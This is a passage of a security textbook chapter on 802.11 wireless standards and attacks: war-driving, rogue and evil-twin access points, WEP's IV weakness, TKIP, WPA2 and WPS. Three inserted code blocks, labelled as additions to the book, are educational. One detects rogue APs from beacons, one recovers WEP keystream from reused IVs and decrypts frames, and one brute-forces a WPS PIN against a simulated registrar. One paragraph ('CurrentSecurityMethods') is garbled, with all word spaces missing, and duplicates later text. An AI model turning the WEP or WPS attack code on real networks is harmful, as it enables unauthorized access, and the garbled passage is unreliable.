Direct-sequence spread spectrum (DSSS) is a modulation type that spreads the traffic sent over the entire bandwidth. It does this by injecting a noise-like signal into the information stream and transmitting the normally narrowband information over the wider band available. The primary reason that spread-spectrum technology is used in 802.11 protocols is to avoid interference on the public 2.4 GHz and 5 GHz bands. Orthogonal frequency division multiplexing (OFDM) multiplexes, or separates, the data to be transmitted into smaller chunks and then transmits the chunks on several subchannels. This use of subchannels is what the "frequency division" portion of the name refers to. Both of these techniques, multiplexing and frequency division, are used to avoid interference. Orthogonal refers to the manner in which the subchannels are assigned, principally to avoid crosstalk, or interference with your own channels.
802.11: Individual Standards
The 802.11b protocol provides for multiple-rate Ethernet over 2.4 GHz spread-spectrum wireless. It provides transfer rates of 1 Mbps, 2 Mbps, 5.5 Mbps, and 11 Mbps and uses DSSS. The most common layout is a point-to-multipoint environment, with the available bandwidth being shared by all users. Typical range is roughly 100 yards indoors and 300 yards outdoors, line of sight. While the wireless transmissions of 802.11 can penetrate some walls and other objects, the best range is offered when both the access point and network client devices have an unobstructed view of each other.
802.11a uses a higher band and has higher bandwidth. It operates in the 5 GHz spectrum using OFDM. Supporting rates of up to 54 Mbps, it is the faster brother of 802.11b; however, the higher frequency used by 802.11a shortens the usable range of the devices and makes it incompatible with 802.11b. The chipsets tend to be more expensive for 802.11a, which has slowed adoption of the standard.
The 802.11g standard uses portions of both of the other standards: it uses the 2.4 GHz band for greater range but uses the OFDM transmission method to achieve the faster 54 Mbps data rates. As it uses the 2.4 GHz band, this standard interoperates with the older 802.11b standard. This allows an 802.11g access point (AP) to give access to both "G" and "B" clients.
The 802.11n version improves on the older standards by greatly increasing speed. It has a functional data rate of up to 600 Mbps, gained through the use of wider channels and multiple-input multiple-output (MIMO) processing. MIMO uses multiple antennas to carry several spatial streams at once, and 802.11n can additionally bond two adjacent 20 MHz channels into one 40 MHz channel to increase data throughput.
802.11ac is the latest in the 5 GHz band, with functional data rates up to a theoretical 6+ Gbps using multiple antennas. The 802.11ac standard was ratified in 2014, and chipsets have been available since late 2011. Designed for multimedia streaming and other high-bandwidth operations, the individual channels are twice the width of 802.11n channels, and as many as eight antennas can be deployed in a multi-user MIMO (MU-MIMO) form.
802.11 proposals don't stop with "ac" though. There are several ideas that extend the 802.11 standard for new and interesting applications. For example, 802.11s is a proposed standard for wireless mesh networks where all nodes on the network are equal instead of using an access point and a client. 802.11p is another example; it defines an application where mobile vehicles can communicate with other vehicles or roadside stations for safety information or toll collection.
All these protocols operate in bands that are "unlicensed" by the FCC. This means that people operating this equipment do not have to be certified by the FCC, but it also means that the devices could possibly share the band with other devices, such as cordless phones, closed-circuit TV (CCTV) wireless transceivers, and other similar equipment. This other equipment can cause interference with the 802.11 equipment, possibly causing speed degradation.
The 2.4 GHz band is commonly used by many household devices that are constantly on, such as cordless phones. It is also the frequency used by microwave ovens to heat food. So if you are having intermittent interference on your Wi-Fi LAN, check to see if the microwave is on.
The 802.11 protocol designers expected some security concerns and attempted to build provisions into the 802.11 protocol that would ensure adequate security. The 802.11 standard includes attempts at rudimentary authentication and confidentiality controls. Authentication is handled in its most basic form by the 802.11 AP, forcing the clients to perform a handshake when attempting to "associate" to the AP.
SSIDs can be set to anything by the person setting up an access point. So, while "FBI Surveillance Van #14" may seem humorous, what about SSIDs with the name of the airport you are in, Starbucks, or the hotel you are in? Can you trust them? Since anyone can use any name, the answer is no. So, if you need a secure connection, you should use some form of secure channel such as a VPN for communication security. For even more security, you can carry your own access point and create a wireless channel that you control.
Association is the process required before the AP will allow the client to talk across the AP to the network. Association occurs only if the client has all the correct parameters needed in the handshake, among them the service set identifier (SSID). The SSID setting is intended to limit access to the authorized users of the wireless network. The SSID is a phrase-based mechanism that helps ensure that you are connecting to the correct AP. This SSID phrase is transmitted in all the access point's beacon frames. The beacon frame is an 802.11 management frame for the network and contains several different fields, such as the timestamp and beacon interval, but most importantly the SSID. This allows attackers to scan for the beacon frame and retrieve the SSID.
The designers of the 802.11 standard also attempted to maintain confidentiality by introducing Wired Equivalent Privacy (WEP), which uses the RC4 stream cipher to encrypt the data as it is transmitted through the air. WEP has been shown to have a design flaw in the way it uses RC4 that can be exploited to break security.
To understand all the 802.11 security problems, you must first look at some of the reasons it became such a prominent technology. Wireless networks came along in 2000 and became very popular. For the first time, it was possible to have almost full-speed network connections without having to be tied down to an Ethernet cable. The technology quickly took off, allowing prices to drop into the consumer range. Once the market shifted to focus on customers who were not necessarily technologists, the products also became very easy to install and operate. Default settings were designed to get the novice users up and running without having to alter anything substantial, and products were described as being able to just plug in and work. These developments further enlarged the market for the low-cost, easy-to-use wireless access points. Then attackers realized that instead of attacking machines over the Internet, they could drive around and seek out these APs.
Typically, access to actual Ethernet segments is protected by physical security measures. This structure allows security administrators to plan for only internal threats to the network and gives them a clear idea of the types and number of machines connected to it. Wireless networking takes the keys to the kingdom and tosses them out the window and into the parking lot. A typical wireless installation broadcasts the network right through the physical controls that are in place. An attacker can drive up and have the same access as if he plugged into an Ethernet jack inside the building; in fact, better access, because 802.11 is a shared medium, allowing sniffers to view all packets being sent to or from the AP and all clients. These APs are also typically behind any security measures the companies have in place, such as firewalls and intrusion detection systems (IDSs). This kind of access into the internal network has caused a large stir among computer security professionals and eventually the media. War-driving, war-flying, war-walking, war-chalking: all of these terms have been used in security article after security article to describe attacks on wireless networks.
Cross Check
Intrusion Detection Systems
Chapter 13 has a lot more information about intrusion detection systems, whereas this chapter references methods of getting past the IDSs. When you learn more about the different IDSs, how would you design an IDS that can catch wireless attackers?
Attacking 802.11
Wireless is a popular target for several reasons: the access gained from wireless, the lack of default security, and the wide proliferation of devices. However, other reasons also make it attackable. The first of these is anonymity: An attacker can probe your building for wireless access from the street. Then he can log packets to and from the AP without giving any indication that an attempted intrusion is taking place. The attacker will announce his presence only if he attempts to associate to the AP. Even then, an attempted association is recorded only by the MAC address of the wireless card associating to it, and most APs do not have alerting functionality to indicate when users associate to it. This fact gives administrators a very limited view of who is gaining access to the network, if they are even paying attention at all. It gives attackers the ability to seek out and compromise wireless networks with relative impunity. The second reason is the low cost of the equipment needed. A single wireless access card costing less than $100 can give access to any unsecured AP within driving range. Finally, attacking a wireless network is relatively easy compared to attacking other target hosts. Windows-based tools for locating and sniffing wireless-based networks have turned anyone who can download files from the Internet and has a wireless card into a potential attacker.
Locating wireless networks was originally termed war-driving, an adaptation of the term war-dialing. War-dialing comes from the 1983 movie WarGames; it is the process of dialing a list of phone numbers looking for modem-connected computers. War-drivers drive around with a wireless locator program recording the number of networks found and their locations. This term has evolved along with war-flying and war-walking, which mean exactly what you expect. War-chalking started with people using chalk on sidewalks to mark some of the wireless networks they found.
Anonymity also works in another way; once an attacker finds an unsecured AP with wireless access, they can use an essentially untraceable IP address to attempt attacks on other Internet hosts.
The most common tools for an attacker to use are reception-based programs that listen to the beacon frames output by other wireless devices, and programs that promiscuously capture all traffic. The most widely used of these programs is called NetStumbler, created by Marius Milner and shown in Figure 12.5. This program listens for the beacon frames of APs that are within range of the card attached to the NetStumbler computer. When it receives the frames, it logs all available information about the AP for later analysis. Since it listens only to beacon frames, NetStumbler displays only networks that have the SSID broadcast turned on. If the computer has a GPS unit attached to it, the program also logs the AP's coordinates. This information can be used to return to the AP or to plot maps of APs in a city.
• Figure 12.5 NetStumbler on a Windows PC
NetStumbler is a Windows-based application, but programs for other operating systems such as OS X, BSD, Linux, and others work on the same principle.
Exam Tip: Because wireless antennas can transmit outside a facility, the proper tuning and placement of these antennas can be crucial for security. Adjusting radiated power through these power-level controls will assist in keeping wireless signals from being broadcast outside areas under physical access control.
Once an attacker has located a network, and assuming that he cannot directly connect and start active scanning and penetration of the network, he will use the best attack tool there is: a network sniffer. The network sniffer, when combined with a wireless network card it can support, is a powerful attack tool, as the shared medium of a wireless network exposes all packets to interception and logging. Popular wireless sniffers are Wireshark (formerly Ethereal) and Kismet. Regular sniffers used on wired Ethernet have also been updated to include support for wireless. Sniffers are also important because they allow you to retrieve the MAC addresses of the nodes of the network. APs can be configured to allow access only to prespecified MAC addresses, and an attacker spoofing the MAC can bypass this feature.
There are specialized sniffer tools designed with a single objective: to crack Wired Equivalent Privacy (WEP) keys. As described earlier, WEP is an encryption protocol that 802.11 uses to attempt to ensure confidentiality of wireless communications. Unfortunately, it has turned out to have several problems. WEP's weaknesses are specifically targeted for attack by the specialized sniffer programs. They work by exploiting weak initialization vectors in the encryption algorithm. To exploit this weakness, an attacker needs a certain number of ciphertext packets; once he has captured enough packets, however, the program can very quickly decipher the encryption key being used. WEPCrack was the first available program to use this flaw to crack WEP keys; however, WEPCrack depends on a dump of actual network packets from another sniffer program. AirSnort is a standalone program that captures its own packets; once it has captured enough ciphertext, it provides the WEP key of the network. Later tools such as aircrack-ng use improved statistical attacks on the key that need far fewer captured packets than these early weak-IV attacks.
Tech Tip
IV Attack
Because of the small length of the initialization vector (IV) in WEP, the protection is subject to attack over time by examining packets and determining when the IV + RC4 key repeats, enabling the defeat of the protection.
Local users of the network are susceptible to having their entire traffic decoded and analyzed. A proper site survey is an important step in securing a wireless network to avoid sending critical data beyond company walls. Recurring site surveys are important because wireless technology is cheap and typically comes unsecured in its default configuration. If anyone attaches a wireless AP to your network, you want to know about it immediately.
Tech Tip
Another Meaning of Rogue Access Point
A "rogue access point" can also refer to an attacker's access point, set up as a man in the middle to capture login information from unsuspecting users.
If unauthorized wireless is set up, it is known as a rogue access point. Rogue access points can be set up by well-meaning employees or hidden by an attacker with physical access. An attacker might set up a rogue access point if they have a limited amount of physical access to an organization, perhaps by sneaking into the building briefly. The attacker can then set up an AP on the network and, by placing it behind the external firewall or network IDS (NIDS) type of security measures, can attach to the wireless at a later date at their leisure. This approach reduces the risk of getting caught by physical security staff, and if the AP is found, it does not point directly back to any kind of traceable address.
Another type of 802.11 attack is known as the evil twin attack. This is the use of an access point owned by an attacker that usually has been enhanced with higher-power and higher-gain antennas to look like a better connection to the users and computers attaching to it. By getting users to connect through the evil access point, attackers can more easily analyze traffic and perform man-in-the-middle type attacks. For simple denial of service, an attacker could use interference to jam the wireless signal, not allowing any computer to connect to the access point successfully.
Cross Check
Identifying Rogue Access Points
In Chapter 8 you learned about how physical security can impact information security, and how several different devices can act as a wireless bridge and be a rogue access point. Can you think of some physical security policies that can help reduce the risk of rogue access points? What about some information security policies?
802.11 networks have two features used primarily for security: one is designed solely for authentication, and the other is designed for authentication and confidentiality. Part of the authentication function, introduced earlier, is known as the service set identifier (SSID). This identifier of up to 32 octets is carried in the management frames that announce the network and in the frames a client sends to join it. The SSID is broadcast by default as the network name in the AP's beacon frames, but including the SSID in the beacon can be disabled (the AP then still sends beacons, with an empty SSID field). Users can authenticate to a network regardless of whether the SSID is broadcast or not, but they do need to know the SSID to connect. Many APs also use a default SSID; for Cisco APs, this default is tsunami, which may indicate an AP that has not been configured for any security. Renaming the SSID and disabling SSID broadcast are both good ideas; however, because the SSID is still sent in the clear in probe responses and association requests whenever a legitimate client connects, these measures should not be considered adequate to secure the network. As the SSID is, hopefully, a unique identifier, only people who know the identifier will be able to complete association to the AP. While the SSID is a good idea in theory, it is sent in plaintext in the packets, so in practice the SSID offers little security significance: any sniffer can determine the SSID. This weakness is magnified by most APs' default settings to transmit beacon frames. The beacon frame's purpose is to announce the wireless network's presence and capabilities so that WLAN cards can attempt to associate to it. This can be disabled in software for many APs, especially the more sophisticated ones. From a security perspective, the beacon frame is damaging because it contains the SSID, and this beacon frame is transmitted at a set interval (ten times per second by default). Since a default AP without any other traffic is sending out its SSID in plaintext ten times a second, you can see why the SSID does not provide true authentication. Scanning programs such as NetStumbler work by capturing the beacon frames and thereby the SSIDs of all APs.
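The beacon frame described above, and the rogue/evil twin access points discussed a few paragraphs earlier, can both be handled by the same small piece of code: parse the beacon, pull out the SSID and capability bits, then compare the advertising BSSID against the list of APs you actually own. The parser below is an added example, not code from the book. The frame layout it walks (24-byte management header, 12 bytes of fixed parameters holding the timestamp, beacon interval and capability field, then tag/length/value elements with SSID as tag 0, DS parameter set as tag 3 and RSN as tag 48) is the real 802.11 layout; the frames and the AUTHORIZED list are constructed test data, the RSN element is truncated to its version field, and find_rogues is an illustrative name, not a standard tool. It assumes the capture driver has already stripped the 802.11 FCS.

```python
"""Parse 802.11 beacon frames, extract the SSID and capabilities, and flag
beacons that advertise a managed SSID from a BSSID we do not own.
Added example, not from the book; the frames below are constructed, not captured."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

MGMT_HEADER_LEN = 24          # frame control, duration, addr1-3, sequence control
FIXED_PARAMS_LEN = 12         # timestamp (8) + beacon interval (2) + capability (2)
CAP_PRIVACY = 0x0010          # capability bit set when WEP/WPA/WPA2 is in use
IE_SSID, IE_RATES, IE_DS_PARAMS, IE_RSN = 0, 1, 3, 48


@dataclass
class Beacon:
    bssid: str
    timestamp: int
    interval_tu: int          # beacon interval in time units (1 TU = 1024 us); 100 TU ~ 10/s
    privacy: bool
    ssid: Optional[str]       # None when the SSID element is empty ("hidden" SSID)
    channel: Optional[int]
    rsn: bool                 # RSN (WPA2) information element present


def is_beacon(frame: bytes) -> bool:
    """Frame control byte 0: bits 2-3 = type (0 = management), bits 4-7 = subtype (8 = beacon)."""
    return len(frame) >= MGMT_HEADER_LEN + FIXED_PARAMS_LEN and frame[0] == 0x80


def parse_beacon(frame: bytes) -> Beacon:
    if not is_beacon(frame):
        raise ValueError("not a beacon frame")
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])       # addr3 carries the BSSID
    timestamp, interval_tu, cap = struct.unpack_from("<QHH", frame, MGMT_HEADER_LEN)
    ssid: Optional[str] = None
    channel: Optional[int] = None
    rsn = False
    off = MGMT_HEADER_LEN + FIXED_PARAMS_LEN
    while off + 2 <= len(frame):                             # walk the tag/length/value elements
        tag, length = frame[off], frame[off + 1]
        value = frame[off + 2: off + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        if tag == IE_SSID and length and any(value):         # empty or all-zero = hidden SSID
            ssid = value.decode("utf-8", errors="replace")
        elif tag == IE_DS_PARAMS and length == 1:
            channel = value[0]
        elif tag == IE_RSN:
            rsn = True
        off += 2 + length
    return Beacon(bssid, timestamp, interval_tu, bool(cap & CAP_PRIVACY), ssid, channel, rsn)


def build_beacon(bssid: str, ssid: str, channel: int, privacy: bool = True,
                 rsn: bool = True, hidden: bool = False, interval_tu: int = 100) -> bytes:
    """Construct a minimal beacon for the examples below (test data, not a capture)."""
    mac = bytes.fromhex(bssid.replace(":", ""))
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + mac + mac + b"\x00\x00"
    cap = 0x0001 | (CAP_PRIVACY if privacy else 0)           # ESS bit, plus privacy when set
    fixed = struct.pack("<QHH", 0, interval_tu, cap)
    ssid_bytes = b"" if hidden else ssid.encode()
    ies = bytes([IE_SSID, len(ssid_bytes)]) + ssid_bytes
    ies += bytes([IE_RATES, 4, 0x82, 0x84, 0x8B, 0x96])      # basic rates 1, 2, 5.5, 11 Mbps
    ies += bytes([IE_DS_PARAMS, 1, channel])
    if rsn:
        ies += bytes([IE_RSN, 2, 0x01, 0x00])                # RSN IE, version field only
    return header + fixed + ies


def find_rogues(frames: List[bytes], authorized: Dict[str, Set[str]]) -> List[Tuple[str, str, Optional[int], str]]:
    """Flag every beacon that carries one of our SSIDs from a BSSID we do not own."""
    findings = []
    for frame in frames:
        if not is_beacon(frame):
            continue
        b = parse_beacon(frame)
        if b.ssid is None or b.ssid not in authorized:
            continue
        if b.bssid not in authorized[b.ssid]:
            reason = "unknown BSSID advertising a managed SSID"
            if not b.privacy:
                reason += "; privacy bit clear (open network, likely evil twin)"
            findings.append((b.ssid, b.bssid, b.channel, reason))
    return findings


# Constructed sample data: one real corporate AP, an evil twin on the same SSID
# and channel with no encryption, an unrelated AP, and one hiding its SSID.
AUTHORIZED = {"CorpNet": {"00:11:22:33:44:55", "00:11:22:33:44:56"}}
SAMPLE_FRAMES = [
    build_beacon("00:11:22:33:44:55", "CorpNet", 6),
    build_beacon("de:ad:be:ef:00:01", "CorpNet", 6, privacy=False, rsn=False),
    build_beacon("aa:bb:cc:dd:ee:ff", "CoffeeShop", 11, privacy=False, rsn=False),
    build_beacon("00:11:22:33:44:57", "CorpNet", 1, hidden=True),
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(parse_beacon(f))
    for finding in find_rogues(SAMPLE_FRAMES, AUTHORIZED):
        print("ROGUE:", finding)
```

Feeding real beacons in is a matter of replacing SAMPLE_FRAMES with the 802.11 payloads from a monitor-mode capture. Note that the hidden-SSID beacon is skipped, not cleared: a hidden SSID still has to be matched through probe responses, which is exactly why hiding it is not a control.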
Exam Tip: MAC filtering can be employed on WAPs but can be bypassed by attackers observing allowed MAC addresses and spoofing the allowed MAC address for the wireless card.
Most APs also have the ability to lock access in only to known MAC addresses, providing a limited authentication capability. Given sniffers' capacity to grab all active MAC addresses on the network, this capability is not very effective. An attacker simply configures his wireless card to a known good MAC address.
WEP encrypts the data traveling across the network with an RC4 stream cipher, attempting to ensure confidentiality. Because the client and the AP must hold the same shared secret key, the key also serves as a crude form of authentication: only a station that knows the key can produce frames the AP will accept, so in principle only authorized people with the proper key have access to the wireless network. WEP supports two key lengths, 40 and 104 bits, though these are more typically referred to as 64 and 128 bits, because 24 bits of the overall key length are used for the initialization vector (IV). In 802.11a and 802.11g, manufacturers have extended this to 152-bit WEP keys, again with 24 bits being used for the IV.
Tech Tip
WEP Isn't Equivalent
WEP should not be trusted alone to provide confidentiality. If WEP is the only protocol supported by your AP, place it outside the corporate firewall and VPN to add more protection.
The IV is the primary reason for the weaknesses in WEP. The IV is sent in the plaintext part of the message, and because the 24-bit IV has only 2^24 (approximately 16.7 million) possible values, the same IV, and therefore the same RC4 keystream, will eventually be reused. Once an IV has been repeated, an attacker has two ciphertexts encrypted with the same keystream; the XOR of the two ciphertexts is the XOR of the two plaintexts, so wherever one plaintext is known or guessable (an ARP or DHCP packet, for example) the attacker recovers the keystream for that IV and can decrypt every other packet sent under it, without ever learning the key. A second class of attack does recover the key itself by examining only packets that have weak IVs, which leak information about the key bytes. Using only weak-IV packets, the number of required captured packets is around four or five million, which can take only a few hours to capture on a fairly busy AP; later statistical attacks on the key, implemented in tools such as aircrack-ng, need only tens of thousands of packets. For a point of reference, this means that equipment with an advertised WEP key of 128 bits can be cracked in less than a day, whereas to crack a normal 128-bit key by brute force would take roughly 2,000,000,000,000,000,000 years on a computer able to attempt one trillion keys a second. As mentioned, AirSnort is a modified sniffing program that takes advantage of this weakness to retrieve the WEP keys. The biggest weakness of WEP is that the IV problem exists regardless of key length, because the IV always remains at 24 bits.
After the limited security functions of a wireless network are broken, the network behaves exactly like a regular Ethernet network and is subject to the exact same vulnerabilities. The host machines that are on or attached to the wireless network are as vulnerable as if they and the attacker were physically connected. Being on the network opens up all machines to vulnerability scanners, Trojan horse programs, virus and worm programs, and traffic interception via sniffer programs. Any unpatched vulnerability on any machine accessible from the wireless segment is now open to compromise.
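The IV weakness described above is easiest to see with the actual arithmetic. The block below is an added example, not code from the book: it implements RC4 inline, builds WEP-style packets (3-byte IV in the clear, then RC4(IV || root key) XORed over plaintext plus CRC-32 ICV), and shows that once two packets share an IV, one known plaintext hands over the keystream and decrypts the other without the key. The root key, IV and packet contents are constructed; the framing is simplified (no 802.11 header, and the fourth key-index byte that real WEP puts after the IV is omitted). The birthday-bound function at the end gives the probability of an IV repeat for random IVs, which is why "16 million" IVs run out after a few thousand packets.

```python
"""WEP keystream reuse under a repeated 24-bit IV. Added example, not from the
book. Key, IV and packets are constructed here, not captured."""
import math
import struct
import zlib
from typing import Dict, List


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                              # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                           # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV (clear) || RC4(IV||key) XOR (plaintext || CRC-32 ICV)."""
    assert len(iv) == 3, "WEP IV is 24 bits"
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    keystream = rc4(iv + root_key, len(plaintext) + 4)
    return iv + xor(plaintext + icv, keystream)


def wep_decrypt(root_key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: strip IV, decrypt, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + root_key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    if struct.unpack("<I", icv)[0] != zlib.crc32(plaintext) & 0xFFFFFFFF:
        raise ValueError("ICV mismatch")
    return plaintext


def group_by_iv(frames: List[bytes]) -> Dict[bytes, List[bytes]]:
    """First step for the attacker: bucket captured bodies by their clear-text IV."""
    groups: Dict[bytes, List[bytes]] = {}
    for f in frames:
        groups.setdefault(f[:3], []).append(f[3:])
    return groups


def decrypt_iv_siblings(frames: List[bytes], known_index: int, known_plaintext: bytes) -> List[bytes]:
    """Attacker: the plaintext of one frame is known (here an ARP request, whose
    LLC/SNAP and header bytes are fixed). XOR gives the keystream for that IV,
    which then decrypts every other frame that reused the IV; the key is never learned."""
    iv = frames[known_index][:3]
    known_icv = struct.pack("<I", zlib.crc32(known_plaintext) & 0xFFFFFFFF)
    keystream = xor(frames[known_index][3:], known_plaintext + known_icv)
    recovered = []
    for body in group_by_iv(frames)[iv]:
        if body == frames[known_index][3:]:
            continue                                   # skip the known frame itself
        n = min(len(keystream), len(body) - 4)         # stop at the ICV or at the end of known keystream
        recovered.append(xor(body[:n], keystream[:n]))
    return recovered


def p_iv_collision(packets: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability of at least one IV repeat among `packets`
    packets when IVs are drawn uniformly from 2**iv_bits values."""
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * 2 ** iv_bits))


# Constructed sample traffic: a 104-bit root key, an ARP request with fully
# known contents, and a second frame sent under the same IV.
ROOT_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3")
IV = b"\x01\x02\x03"
P_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"\x00\x01\x08\x00\x06\x04\x00\x01"  # LLC/SNAP + ARP header
P_SECRET = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"secret-12byt"                    # LLC/SNAP (IPv4) + payload
FRAMES = [
    wep_encrypt(ROOT_KEY, IV, P_ARP),
    wep_encrypt(ROOT_KEY, IV, P_SECRET),                 # same IV, same keystream
    wep_encrypt(ROOT_KEY, b"\x01\x02\x04", P_SECRET),    # different IV, untouched by this attack
]

if __name__ == "__main__":
    print("recovered:", decrypt_iv_siblings(FRAMES, 0, P_ARP))
    print("P(IV repeat) after 5000 random-IV packets: %.2f" % p_iv_collision(5000))
```

The recovered keystream is only as long as the known plaintext plus ICV, so in practice an attacker grows it with longer known packets or by injecting traffic; the point of the example is that nothing about the 104-bit key changes the outcome, because the reuse is a property of the 24-bit IV alone.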
CurrentSecurityMethods
WEPwasdesignedtoprovidesomemeasureofconfidentialityonan802.11networksimilartowhatisfoundonawirednetwork,butthathasnotbeenthecase.Accordingly,theWi-FiAlliancedevelopedWi-FiProtectedAccess(WPA)toimproveuponWEP.The802.11istandardistheIEEEstandardforsecurityinwirelessnetworks,alsoknownasWi-FiProtectedAccess2(WPA2).Ituses802.1Xtoprovideauthentication.WPA2canuseAdvancedEncryptionStandard(AES)astheencryptionprotocol.The802.11istandardspecifiestheuseoftheTemporalKeyIntegrityProtocol(TKIP)andusesAESwiththeCounterModewithCBC-MACProtocol(infull,theCounterModewithCipherBlockChaining–MessageAuthenticationCodesProtocol,orsimplyCCMP).Thesetwoprotocolshavedifferentfunctions,buttheybothservetoenhancesecurity.TKIPworksbyusingasharedsecretcombinedwiththecard’sMAC
addresstogenerateanewkey,whichismixedwiththeIVtomakeper-packetkeysthatencryptasinglepacketusingthesameRC4cipherusedbytraditionalWEP.ThisovercomestheWEPkeyweakness,asakeyisusedononlyonepacket.Theotheradvantagetothismethodisthatitcanberetrofittedtocurrenthardwarewithonlyasoftwarechange,unlikeAESand802.1X.CCMPisactuallythemodeinwhichtheAEScipherisusedtoprovidemessageintegrity.UnlikeTKIP,CCMPrequiresnewhardwaretoperformtheAESencryption.Theadvancesof802.11ihavecorrectedtheweaknessesofWEP.
WPA
The first standard to be used in the market to replace WEP was Wi-Fi Protected Access (WPA). This standard keeps WEP's flawed RC4-based design but wraps it in the Temporal Key Integrity Protocol (TKIP). While WEP uses a 40-bit or 104-bit encryption key that must be manually entered on wireless access points and devices and does not change, TKIP employs a per-packet key, generating a new 128-bit RC4 key for each packet. This can generally be accomplished with only a firmware update, enabling a simple solution to the types of attacks that compromise WEP.

TKIP
Temporal Key Integrity Protocol (TKIP) was created as a stopgap security measure to replace the WEP protocol without requiring the replacement of legacy hardware. The breaking of WEP had left Wi-Fi networks without viable link-layer security, and a solution was required for already deployed hardware. TKIP works by mixing a secret root key with the IV (extended to a 48-bit sequence counter, which also lets the receiver reject replayed frames) before the RC4 encryption, and it adds a keyed message integrity code (Michael) in place of WEP's CRC. WPA/TKIP uses the same underlying RC4 mechanism as WEP, and consequently is vulnerable to a number of similar attacks. TKIP is no longer considered secure; it has been deprecated, and WPA2 networks should be configured for CCMP only.

WPA2
IEEE 802.11i is the standard for security in wireless networks and is also known as Wi-Fi Protected Access 2 (WPA2). It uses 802.1X to provide authentication (WPA2-Enterprise) or a pre-shared key (WPA2-Personal), and uses the Advanced Encryption Standard (AES) as the encryption algorithm. WPA2 uses the AES block cipher, a significant improvement over WEP's and WPA's use of the RC4 stream cipher. The 802.11i standard specifies the use of the Counter Mode with CBC-MAC Protocol (in full, the Counter Mode with Cipher Block Chaining–Message Authentication Code Protocol, or simply CCMP).
WPS
Wi-Fi Protected Setup (WPS) is a network security standard that was created to provide users with an easy method of configuring wireless networks. Designed for home networks and small business networks, this standard involves the use of an eight-digit PIN to configure wireless devices. WPS consists of a series of Extensible Authentication Protocol (EAP) messages and has been shown to be susceptible to a brute-force attack: the eighth digit of the PIN is a checksum of the first seven, and the registrar exchange confirms the first four digits separately from the last three, so an attacker needs at most 11,000 guesses rather than 100 million. A successful attack can reveal the PIN and subsequently the WPA/WPA2 passphrase and allow unauthorized parties to gain access to the network. Currently, the only effective mitigation is to disable WPS.
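The reduction of the WPS search space to 11,000 attempts, as an added example that is not part of the book: the PIN check-digit rule, and a constructed in-process stand-in for the AP's registrar that answers the two half-PIN questions the way the real M4/M6 exchange does. `ToyRegistrar`, `brute_force_pin` and the target PIN are this example's own; no radio or real AP is involved.

```python
"""Added example, not from the book: why the WPS PIN yields to brute force.

The PIN has eight decimal digits, but the eighth is a checksum of the first
seven, and the registrar protocol acknowledges the first four digits (message
M4) separately from the last three (message M6). An attacker therefore needs at
most 10**4 + 10**3 = 11,000 guesses instead of 10**8. ToyRegistrar is a
constructed stand-in that exposes the same half-PIN oracle; no real AP or
radio is involved."""


def wps_checksum(first7: int) -> int:
    """Check digit over the first seven digits (alternating weights 3 and 1)."""
    accum, n = 0, first7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


class ToyRegistrar:
    """Stand-in for the access point's registrar. In the real protocol a wrong
    first half is rejected at M4 and a wrong second half at M6, which is
    exactly the oracle modelled here."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("PIN fails checksum")
        self._pin = pin
        self.attempts = 0

    def check_first_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self._pin[:4]

    def check_second_half(self, first_half: str, half: str) -> bool:
        self.attempts += 1
        return first_half == self._pin[:4] and half == self._pin[4:]


def brute_force_pin(reg: ToyRegistrar) -> str:
    """Recover the PIN using the two half-PIN oracles (at most 11,000 tries)."""
    first = None
    for i in range(10_000):
        if reg.check_first_half(f"{i:04d}"):
            first = f"{i:04d}"
            break
    if first is None:
        raise RuntimeError("first half not found")
    for j in range(1_000):
        three = f"{j:03d}"
        # Only the three free digits are guessed; the check digit is computed.
        second = three + str(wps_checksum(int(first + three)))
        if reg.check_second_half(first, second):
            return first + second
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    reg = ToyRegistrar("12345670")  # constructed target PIN (passes the checksum)
    print(brute_force_pin(reg), "after", reg.attempts, "attempts")
```

Rate limiting or lockout after repeated failures would blunt this, but many access points of the period had none, which is why the text's advice to disable WPS stands.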
Setting Up WPA2
If WPS is not safe for use, how does one set up WPA2? To set up WPA2, you need to have several parameters. Figure 12.6 shows the screens for a WPA2 setup in Windows 7.

• Figure 12.6 WPA2 setup options in Windows 7

The first element is to choose a security framework. When configuring an adapter to connect to an existing network, you need to match the choice of the network. When setting up your own network, you can choose whichever option you prefer. There are many selections, but for security purposes, you should choose WPA2-Personal or WPA2-Enterprise. Both of these require the choice of an encryption type, either TKIP or AES. TKIP has been deprecated, so choose AES. The last element is the choice of the network security key, the secret that is shared by all users. In WPA2-Personal that passphrase is not used directly; both sides stretch it into a 256-bit pairwise master key, so its length and unpredictability are what stand between a captured handshake and an offline guessing attack. WPA2-Enterprise, which is designed to be used with an 802.1X authentication server that distributes different keys to each user, is typically used in business environments.
